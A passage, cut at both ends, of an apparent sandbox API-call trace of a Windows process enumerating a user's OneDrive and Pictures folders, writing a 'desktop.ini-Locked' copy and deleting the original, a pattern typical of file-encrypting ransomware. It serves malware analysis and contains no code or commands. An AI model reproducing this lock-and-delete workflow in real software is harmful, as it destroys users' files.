dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0303.352] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0303.352] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x84aeda3c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x67, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0303.352] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x84aeda3c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x67, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0303.353] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0303.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0303.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0303.353] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini-Locked", lpFilePart=0x0) returned 0x31 [0303.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.353] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.354] GetFileType (hFile=0x49c) returned 0x1 [0303.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.354] GetFileType (hFile=0x49c) returned 0x1 [0303.359] CloseHandle (hObject=0x49c) returned 1 [0303.359] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini", lpFilePart=0x0) returned 0x2a [0303.359] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\desktop.ini")) returned 1 [0303.360] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures", lpFilePart=0x0) returned 0x1e [0303.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0303.360] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures", lpFilePart=0x0) returned 0x1e [0303.360] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpFilePart=0x0) returned 0x1f [0303.360] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4766337, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4766337, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0303.361] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4766337, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4766337, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0303.361] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe09667f0, ftCreationTime.dwHighDateTime=0x1d7e47c, ftLastAccessTime.dwLowDateTime=0x6bc5fe90, ftLastAccessTime.dwHighDateTime=0x1d7e4f4, ftLastWriteTime.dwLowDateTime=0x6bc5fe90, ftLastWriteTime.dwHighDateTime=0x1d7e4f4, nFileSizeHigh=0x0, nFileSizeLow=0x12a83, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yrCaSxSlfeUmFUe0U.bmp", cAlternateFileName="-YRCAS~1.BMP")) returned 1 [0303.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d1ef550, ftCreationTime.dwHighDateTime=0x1d7e44c, ftLastAccessTime.dwLowDateTime=0x598db060, ftLastAccessTime.dwHighDateTime=0x1d7e602, ftLastWriteTime.dwLowDateTime=0x598db060, ftLastWriteTime.dwHighDateTime=0x1d7e602, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="0VXzeqDCRdwWVtEOwAjX.bmp", cAlternateFileName="0VXZEQ~1.BMP")) returned 1 [0303.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c9a970, ftCreationTime.dwHighDateTime=0x1d7e294, ftLastAccessTime.dwLowDateTime=0xa36d5ab0, ftLastAccessTime.dwHighDateTime=0x1d7e61a, ftLastWriteTime.dwLowDateTime=0xa36d5ab0, ftLastWriteTime.dwHighDateTime=0x1d7e61a, nFileSizeHigh=0x0, nFileSizeLow=0x2ec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="1a-5T7.png", cAlternateFileName="")) returned 1 [0303.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e7b3f0, ftCreationTime.dwHighDateTime=0x1d7d8d1, ftLastAccessTime.dwLowDateTime=0xc38e1a30, ftLastAccessTime.dwHighDateTime=0x1d7dc85, ftLastWriteTime.dwLowDateTime=0xc38e1a30, ftLastWriteTime.dwHighDateTime=0x1d7dc85, nFileSizeHigh=0x0, nFileSizeLow=0x1874f, dwReserved0=0x0, dwReserved1=0x0, cFileName="1rEhjaUCQFs c9JBp.jpg", cAlternateFileName="1REHJA~1.JPG")) returned 1 [0303.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a8acf00, ftCreationTime.dwHighDateTime=0x1d7e18a, ftLastAccessTime.dwLowDateTime=0x63e47910, ftLastAccessTime.dwHighDateTime=0x1d7e687, ftLastWriteTime.dwLowDateTime=0x63e47910, ftLastWriteTime.dwHighDateTime=0x1d7e687, nFileSizeHigh=0x0, nFileSizeLow=0x15870, dwReserved0=0x0, dwReserved1=0x0, cFileName="3Cpzt7PCzTidXfHRDLk.png", cAlternateFileName="3CPZT7~1.PNG")) returned 1 [0303.390] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a6c80, ftCreationTime.dwHighDateTime=0x1d7e1fc, ftLastAccessTime.dwLowDateTime=0xa7305cf0, ftLastAccessTime.dwHighDateTime=0x1d7e5a8, ftLastWriteTime.dwLowDateTime=0xa7305cf0, ftLastWriteTime.dwHighDateTime=0x1d7e5a8, nFileSizeHigh=0x0, nFileSizeLow=0x147ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="7krBdWYoZTKAhW.gif", cAlternateFileName="7KRBDW~1.GIF")) returned 1 [0303.390] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0303.390] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6111a40, ftCreationTime.dwHighDateTime=0x1d7d938, ftLastAccessTime.dwLowDateTime=0x1d770990, ftLastAccessTime.dwHighDateTime=0x1d7e3e7, ftLastWriteTime.dwLowDateTime=0x1d770990, ftLastWriteTime.dwHighDateTime=0x1d7e3e7, nFileSizeHigh=0x0, nFileSizeLow=0x15566, dwReserved0=0x0, dwReserved1=0x0, cFileName="cWtM6sPompJDNhYi.bmp", cAlternateFileName="CWTM6S~1.BMP")) returned 1 [0303.391] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0303.391] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14287cd0, ftCreationTime.dwHighDateTime=0x1d7db85, ftLastAccessTime.dwLowDateTime=0x2cfff700, ftLastAccessTime.dwHighDateTime=0x1d7dd7a, ftLastWriteTime.dwLowDateTime=0x2cfff700, ftLastWriteTime.dwHighDateTime=0x1d7dd7a, nFileSizeHigh=0x0, nFileSizeLow=0xaee6, dwReserved0=0x0, dwReserved1=0x0, cFileName="f-BdV5SdU0Bq6dRLimk5.bmp", cAlternateFileName="F-BDV5~1.BMP")) returned 1 [0303.391] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26100080, ftCreationTime.dwHighDateTime=0x1d7d946, ftLastAccessTime.dwLowDateTime=0x89fc9670, ftLastAccessTime.dwHighDateTime=0x1d7e1a3, ftLastWriteTime.dwLowDateTime=0x89fc9670, ftLastWriteTime.dwHighDateTime=0x1d7e1a3, nFileSizeHigh=0x0, nFileSizeLow=0x10b38, dwReserved0=0x0, dwReserved1=0x0, cFileName="JBjtDOPdC.jpg", cAlternateFileName="JBJTDO~1.JPG")) returned 1 [0303.391] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce85b280, ftCreationTime.dwHighDateTime=0x1d7e528, ftLastAccessTime.dwLowDateTime=0xea987400, ftLastAccessTime.dwHighDateTime=0x1d7e73d, ftLastWriteTime.dwLowDateTime=0xea987400, ftLastWriteTime.dwHighDateTime=0x1d7e73d, nFileSizeHigh=0x0, nFileSizeLow=0x1714, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ju9W4N8R3NHzR1k.png", cAlternateFileName="JU9W4N~1.PNG")) returned 1 [0303.392] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73479290, ftCreationTime.dwHighDateTime=0x1d7e068, ftLastAccessTime.dwLowDateTime=0x7c51f90, ftLastAccessTime.dwHighDateTime=0x1d7e0c4, ftLastWriteTime.dwLowDateTime=0x7c51f90, ftLastWriteTime.dwHighDateTime=0x1d7e0c4, nFileSizeHigh=0x0, nFileSizeLow=0x21e7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONjt5so8gB0htr9SLu.jpg", cAlternateFileName="ONJT5S~1.JPG")) returned 1 [0303.392] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf57f8ad0, ftCreationTime.dwHighDateTime=0x1d7dc06, ftLastAccessTime.dwLowDateTime=0xc8c44f20, ftLastAccessTime.dwHighDateTime=0x1d7debe, ftLastWriteTime.dwLowDateTime=0xc8c44f20, ftLastWriteTime.dwHighDateTime=0x1d7debe, nFileSizeHigh=0x0, nFileSizeLow=0x98a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ovrZpwsZ9oIx2.png", cAlternateFileName="OVRZPW~1.PNG")) returned 1 [0303.392] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41c324b0, ftCreationTime.dwHighDateTime=0x1d7dc3e, ftLastAccessTime.dwLowDateTime=0x50496e10, ftLastAccessTime.dwHighDateTime=0x1d7e60a, ftLastWriteTime.dwLowDateTime=0x50496e10, ftLastWriteTime.dwHighDateTime=0x1d7e60a, nFileSizeHigh=0x0, nFileSizeLow=0x121e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="QNrRte.png", cAlternateFileName="")) returned 1 [0303.392] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0303.392] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b02ae90, ftCreationTime.dwHighDateTime=0x1d7db7e, ftLastAccessTime.dwLowDateTime=0xe06af00, ftLastAccessTime.dwHighDateTime=0x1d7e2c6, ftLastWriteTime.dwLowDateTime=0xe06af00, ftLastWriteTime.dwHighDateTime=0x1d7e2c6, nFileSizeHigh=0x0, nFileSizeLow=0x2d26, dwReserved0=0x0, dwReserved1=0x0, cFileName="soGL3VvH3.jpg", cAlternateFileName="SOGL3V~1.JPG")) returned 1 [0303.393] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efbcc30, ftCreationTime.dwHighDateTime=0x1d7e075, ftLastAccessTime.dwLowDateTime=0xeee32ed0, ftLastAccessTime.dwHighDateTime=0x1d7e605, ftLastWriteTime.dwLowDateTime=0xeee32ed0, ftLastWriteTime.dwHighDateTime=0x1d7e605, nFileSizeHigh=0x0, nFileSizeLow=0xde2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="tQi0H8EC.jpg", cAlternateFileName="")) returned 1 [0303.393] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29092a90, ftCreationTime.dwHighDateTime=0x1d7e5ef, ftLastAccessTime.dwLowDateTime=0x886dcf50, ftLastAccessTime.dwHighDateTime=0x1d7e765, ftLastWriteTime.dwLowDateTime=0x886dcf50, ftLastWriteTime.dwHighDateTime=0x1d7e765, nFileSizeHigh=0x0, nFileSizeLow=0x2e73, dwReserved0=0x0, dwReserved1=0x0, cFileName="u6iPBC1t5.gif", cAlternateFileName="U6IPBC~1.GIF")) returned 1 [0303.393] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5ec2370, ftCreationTime.dwHighDateTime=0x1d7d891, ftLastAccessTime.dwLowDateTime=0xb6e42680, ftLastAccessTime.dwHighDateTime=0x1d7dfe1, ftLastWriteTime.dwLowDateTime=0xb6e42680, ftLastWriteTime.dwHighDateTime=0x1d7dfe1, nFileSizeHigh=0x0, nFileSizeLow=0x44b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uy1att05vGLsri.png", cAlternateFileName="UY1ATT~1.PNG")) returned 1 [0303.393] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa04425a0, ftCreationTime.dwHighDateTime=0x1d7dd03, ftLastAccessTime.dwLowDateTime=0x2963dc60, ftLastAccessTime.dwHighDateTime=0x1d7e1cb, ftLastWriteTime.dwLowDateTime=0x2963dc60, ftLastWriteTime.dwHighDateTime=0x1d7e1cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vtWu-", cAlternateFileName="")) returned 1 [0303.393] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30b4f80, ftCreationTime.dwHighDateTime=0x1d7d799, ftLastAccessTime.dwLowDateTime=0x32a60f90, ftLastAccessTime.dwHighDateTime=0x1d7e3f7, ftLastWriteTime.dwLowDateTime=0x32a60f90, ftLastWriteTime.dwHighDateTime=0x1d7e3f7, nFileSizeHigh=0x0, nFileSizeLow=0xf452, dwReserved0=0x0, dwReserved1=0x0, cFileName="VVbwcj.jpg", cAlternateFileName="")) returned 1 [0303.394] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c73cf60, ftCreationTime.dwHighDateTime=0x1d7df91, ftLastAccessTime.dwLowDateTime=0x3c24f220, ftLastAccessTime.dwHighDateTime=0x1d7e2f8, ftLastWriteTime.dwLowDateTime=0x3c24f220, ftLastWriteTime.dwHighDateTime=0x1d7e2f8, nFileSizeHigh=0x0, nFileSizeLow=0x833a, dwReserved0=0x0, dwReserved1=0x0, cFileName="X0o USyk.gif", cAlternateFileName="X0OUSY~1.GIF")) returned 1 [0303.394] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc5b7f40, ftCreationTime.dwHighDateTime=0x1d7dbdc, ftLastAccessTime.dwLowDateTime=0x789393a0, ftLastAccessTime.dwHighDateTime=0x1d7e308, ftLastWriteTime.dwLowDateTime=0x789393a0, ftLastWriteTime.dwHighDateTime=0x1d7e308, nFileSizeHigh=0x0, nFileSizeLow=0x37c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="xDBEu.png", cAlternateFileName="")) returned 1 [0303.394] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x304d0990, ftCreationTime.dwHighDateTime=0x1d7dc92, ftLastAccessTime.dwLowDateTime=0xf8112660, ftLastAccessTime.dwHighDateTime=0x1d7df20, ftLastWriteTime.dwLowDateTime=0xf8112660, ftLastWriteTime.dwHighDateTime=0x1d7df20, nFileSizeHigh=0x0, nFileSizeLow=0x12438, dwReserved0=0x0, dwReserved1=0x0, cFileName="YSfbkFfVqb.jpg", cAlternateFileName="YSFBKF~1.JPG")) returned 1 [0303.394] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0303.395] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0303.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0303.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0303.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0303.395] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures", lpFilePart=0x0) returned 0x1e [0303.395] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpFilePart=0x0) returned 0x1f [0303.396] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4766337, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4766337, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0303.396] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4766337, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4766337, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0303.396] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe09667f0, ftCreationTime.dwHighDateTime=0x1d7e47c, ftLastAccessTime.dwLowDateTime=0x6bc5fe90, ftLastAccessTime.dwHighDateTime=0x1d7e4f4, ftLastWriteTime.dwLowDateTime=0x6bc5fe90, ftLastWriteTime.dwHighDateTime=0x1d7e4f4, nFileSizeHigh=0x0, nFileSizeLow=0x12a83, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yrCaSxSlfeUmFUe0U.bmp", cAlternateFileName="-YRCAS~1.BMP")) returned 1 [0303.397] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d1ef550, ftCreationTime.dwHighDateTime=0x1d7e44c, ftLastAccessTime.dwLowDateTime=0x598db060, ftLastAccessTime.dwHighDateTime=0x1d7e602, ftLastWriteTime.dwLowDateTime=0x598db060, ftLastWriteTime.dwHighDateTime=0x1d7e602, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="0VXzeqDCRdwWVtEOwAjX.bmp", cAlternateFileName="0VXZEQ~1.BMP")) returned 1 [0303.397] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c9a970, ftCreationTime.dwHighDateTime=0x1d7e294, ftLastAccessTime.dwLowDateTime=0xa36d5ab0, ftLastAccessTime.dwHighDateTime=0x1d7e61a, ftLastWriteTime.dwLowDateTime=0xa36d5ab0, ftLastWriteTime.dwHighDateTime=0x1d7e61a, nFileSizeHigh=0x0, nFileSizeLow=0x2ec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="1a-5T7.png", cAlternateFileName="")) returned 1 [0303.397] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e7b3f0, ftCreationTime.dwHighDateTime=0x1d7d8d1, ftLastAccessTime.dwLowDateTime=0xc38e1a30, ftLastAccessTime.dwHighDateTime=0x1d7dc85, ftLastWriteTime.dwLowDateTime=0xc38e1a30, ftLastWriteTime.dwHighDateTime=0x1d7dc85, nFileSizeHigh=0x0, nFileSizeLow=0x1874f, dwReserved0=0x0, dwReserved1=0x0, cFileName="1rEhjaUCQFs c9JBp.jpg", cAlternateFileName="1REHJA~1.JPG")) returned 1 [0303.398] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a8acf00, ftCreationTime.dwHighDateTime=0x1d7e18a, ftLastAccessTime.dwLowDateTime=0x63e47910, ftLastAccessTime.dwHighDateTime=0x1d7e687, ftLastWriteTime.dwLowDateTime=0x63e47910, ftLastWriteTime.dwHighDateTime=0x1d7e687, nFileSizeHigh=0x0, nFileSizeLow=0x15870, dwReserved0=0x0, dwReserved1=0x0, cFileName="3Cpzt7PCzTidXfHRDLk.png", cAlternateFileName="3CPZT7~1.PNG")) returned 1 [0303.398] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a6c80, ftCreationTime.dwHighDateTime=0x1d7e1fc, ftLastAccessTime.dwLowDateTime=0xa7305cf0, ftLastAccessTime.dwHighDateTime=0x1d7e5a8, ftLastWriteTime.dwLowDateTime=0xa7305cf0, ftLastWriteTime.dwHighDateTime=0x1d7e5a8, nFileSizeHigh=0x0, nFileSizeLow=0x147ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="7krBdWYoZTKAhW.gif", cAlternateFileName="7KRBDW~1.GIF")) returned 1 [0303.399] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, 